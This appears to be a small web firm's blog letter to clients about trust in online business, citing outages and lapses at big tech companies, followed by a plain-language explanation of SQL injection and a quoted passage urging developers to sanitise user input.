trust and the internet business relationship

Dear client, prospect, vendor, partner, team-member, or casual web surfer:

At CDLLC, we constantly strive to keep everyone in the family satisfied, and in the process, each client places a lot of trust in CDLLC, for which we are very grateful.

We also understand that it can be quite nerve-wracking to be that new client, putting your trust in us to take care of you and your business. And we appreciate the pain of the adjustment process you (new customer) have been brave enough to undertake.

During this adjustment, communications struggles and trust issues inevitably pop up. "Did I get short-changed?" "Have I received what what I paid for?" This is perfectly understandable, as the same thing occurs with any new partnership involving the purchase of extremely complex systems, where there is conceivably lots of room for "smoke-and-mirrors" type price gouging.

This 'internet anxiety,' can reach a point where a you (new client) might even begin to doubt the honesty and ethics of CDLLC. We COMPLETELY understand this, and have in fact been in the same position ourselves, with our first vendors way back when the commercial internet took off about a decade ago.

Why is this so anxiety provoking?

Well, one explanation is because the INTERNET, e-commerce, e-transactions, this whole hyper-speed information revolution: it's a new frontier: WEIRD NEW STUFF!

In the words of a wise associate, "it's still the wild west out there."

Even the powerhouses of cyberspace stumble at times with the loosey-goosey, constantly hyper-speed-evolving nature of business on the internet.

Below is listed a handful of examples, for the purpose of hopefully reassuring you (precious new customer), that we play by the same rules as the Microsofts, Amazons, and Yahoos of the internet...

1. http://valleywag.com/5037267/netflix-crash-caused-by-botched-oracle-upgrade: systems crash, and rollback procedures are not always simple. Ask NetFlix.
2. http://www.out-law.com/page-4049: things expire, the show-no-weakness corporation gets a little egg on the face (oops! Microsoft lost their domain name ownership)
3. http://news.cnet.com/Good-Samaritan-squashes-Hotmail-lapse/2100-1023_3-234907.html: oops take 2, Microsoft lost their domain ownership again
4. http://www.sslshopper.com/article-ssl-certificate-renewal-even-google-forgets.html:
   oops take 3, Google's secure certificate expired!

The take-away from this mini-dissertation is as follows:

Business will always be business: people trading with people. The medium through which transactions occur may change (pony express, telegraph, telephone, email, web forms, instant e-stock trades), and this is always unfamiliar and intimidating.

However, these new transaction media all have one thing in common: they are engineered, created, and used by people. And with these people, the same rules of business still apply.

At the end of the day, it's all about the age-old mutually-beneficial trust relationships between two parties- perhaps corporate entities. Let us not forget: those big corporations are owned by people, too, just like you and me.

A special thank you to all of our clients who entrust us to protect their business in the wild west of the internet.

What's SQL Injection? Some new drug or something?

In a nutshell, "SQL injection" is a way to hack into a website, break it, or otherwise make a big mess of it. SQL is a database language, that uses statements like INSERT, DELETE, and UPDATE.

Think of SQL injection as analogous to Microsoft's buffer overflow problems (you know those windows updates that you get at 3AM every morning- a lot of 'em fix Microsoft's failure to properly handle buffer overflows) .

So both buffer overflow and SQLinjection happen when you put a bunch of extra stuff into a URL in your address bar, in such a way that it gets dumped onto the server and actually runs the words you put in the URL.

For example, http://crockettdunn.blogspot.com/?andDeleteAllOfCrockettsBlog

Obviously it's not that simple, but that's the idea.

"But Crockett," you ask, "why do I care about SQL injection?"

See below:
from the article, link to article: http://msdn.microsoft.com/en-us/library/ms998271.aspx:

See SQL injection attacks on the rise During the past few months, SQL injection
attacks have been used to break into hundreds of thousands of Web sites powered
by Microsoft's Internet Information Server (IIS) and SQL Server. The attacks
pass unauthorized SQL queries to backend database servers, where they perform
any of number of actions, such as deleting entire databases or tables and
modifying various types stored data, including text and HTML.Microsoft, SANS, Shadow
Server, Trend
Micro, F-Secure, and
numerous other organizations have written about the ongoing problem, which has
been occurring since at least last March. In a nutshell, the bad guys are
exploiting flaws in ASP.NET applications to inject unwanted HTML code into
database records. That HTML eventually winds up in Web pages. When you browse to
the page, the HTML code tries to exploit security vulnerabilities in browsers
and related tools to install a variety of malware onto your PC.These attacks are
possible because of security bugs in various ASP.NET-based applications.
Apparently, many developers have overlooked the need to properly sanitize input
supplied by Web users.For example, a Web form might ask people to enter their
name and e-mail address to sign up for a newsletter. Along with that
information, a hacker could add some special characters and a valid SQL query
statement. If that input isn't properly sanitized before it's sent to the SQL
server, the server might be tricked into executing the query supplied by the bad
guy.The solution is to audit your Web applications to make sure they sanitize
user-supplied input. Microsoft's article
entitled "How To: Protect From SQL Injection in ASP.NET" explains the required
steps.